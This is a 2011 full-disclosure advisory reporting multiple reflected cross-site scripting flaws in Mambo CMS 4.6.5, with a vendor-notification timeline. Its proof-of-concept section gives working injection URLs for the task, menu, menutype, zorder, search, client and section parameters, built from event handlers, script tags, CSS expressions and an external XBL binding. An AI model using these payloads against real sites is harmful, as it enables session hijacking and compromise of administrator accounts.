Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities 1. OVERVIEW Mambo CMS 4.6.5 and lower versions are vulnerable to Cross Site Scripting. 2. BACKGROUND Mambo is a full-featured, award-winning content management system that can be used for everything from simple websites to complex corporate applications. It is used all over the world to power government portals, corporate intranets and extranets, ecommerce sites, nonprofit outreach, schools, church, and community sites. Mambo's "power in simplicity" also makes it the CMS of choice for many small businesses and personal sites. 3. VULNERABILITY DESCRIPTION Multiple parameters (task, menu, menutype, zorder, search, client, section) are not properly sanitized, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSIONS AFFECTED Tested on Mambo CMS 4.6.5 (current as of 2011-06-27) 5. PROOF-OF-CONCEPT/EXPLOIT FrontEnd ============== param: task http://attacker.in/mambo/index.php?option=com_content&task=%22%20style=width:1000px;height:1000px;top:0;left:0;position:absolute%20onmouseover=alert%28/XSS/%29%20&id=3&Itemid=32 BackEnd ============== param: menu http://attacker.in/mambo/administrator/index2.php?option=com_menumanager&task=edit&hidemainmenu=1&menu=Move+your+mouse+here%22%20style=position:absolute;width:1000px;height:1000px;top:0;left:0;%20onmouseover=alert%28/XSS/%29%20 param: menutype [hidden form xss, esp in IE 6,7 and older versions of Firefox] http://attacker.in/mambo/administrator/index2.php?option=com_menus&menutype=xss"%20style%3dx%3aexpression(alert(/XSS/))%20XSSSSSSSS http://attacker.in/mambo/administrator/index2.php?option=com_menus&menutype=xss"%20%20%20style=background-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;%20x=%20XSSSSSSSS param: zorder http://attacker.in/mambo/administrator/index2.php?limit=10&order%5b%5d=11&boxchecked=0&toggle=on&search=simple_search&task=&limitstart=0&cid%5b%5d=on&zorder=c.ordering+DESC"><script>alert(/XSS/)</script>&filter_authorid=62&hidemainmenu=0&option=com_typedcontent param: search http://attacker.in/mambo/administrator/index2.php?limit=10&boxchecked=0&toggle=on&search=xss"><script>alert(/XSS/)</script>&task=&limitstart=0&hidemainmenu=0&option=com_comment param: client http://attacker.in/mambo/administrator/index2.php?option=com_modules&client=%27%22%20onmouseover=alert%28/XSS/%29%20a=%22%27 NB: mouseover on "banner" link param: section [hidden form xss, esp in IE 6,7 and older versions of Firefox] http://attacker.in/mambo/administrator/index2.php?option=com_categories§ion=com_weblinks"%20style%3dx%3aexpression(alert(/XSS/))%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2 http://attacker.in/mambo/administrator/index2.php?option=com_categories§ion=com_weblinks"%20style%3d-moz-binding:url(http://www.businessinfo.co.uk/labs/xbl/xbl.xml%23xss)%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2 http://attacker.in/mambo/administrator/index2.php?option=com_categories§ion=com_weblinks"%20%20style=background-image:url('javascript:alert(0)');width:1000px;height:1000px;display:block;%20x=%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2 http://attacker.in/mambo/administrator/index2.php?option=com_categories§ion=com_weblinks"%20%20style=background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%20x=%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2 6. SOLUTION The vendor seems to discontinue the development. It is recommended to use another CMS in active development. 7. VENDOR Mambo CMS Development Team http://mambo-developer.org 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2010-11-31: notified vendor through bug tracker 2011-06-27: no patched version released up to date 2011-06-27: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[mambo4.6.x]_cross_site_scripting Mambo CMS: http://mambo-code.org/gf/download/frsrelease/388/791/MamboV4.6.5.zip #yehg [2011-06-27] _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/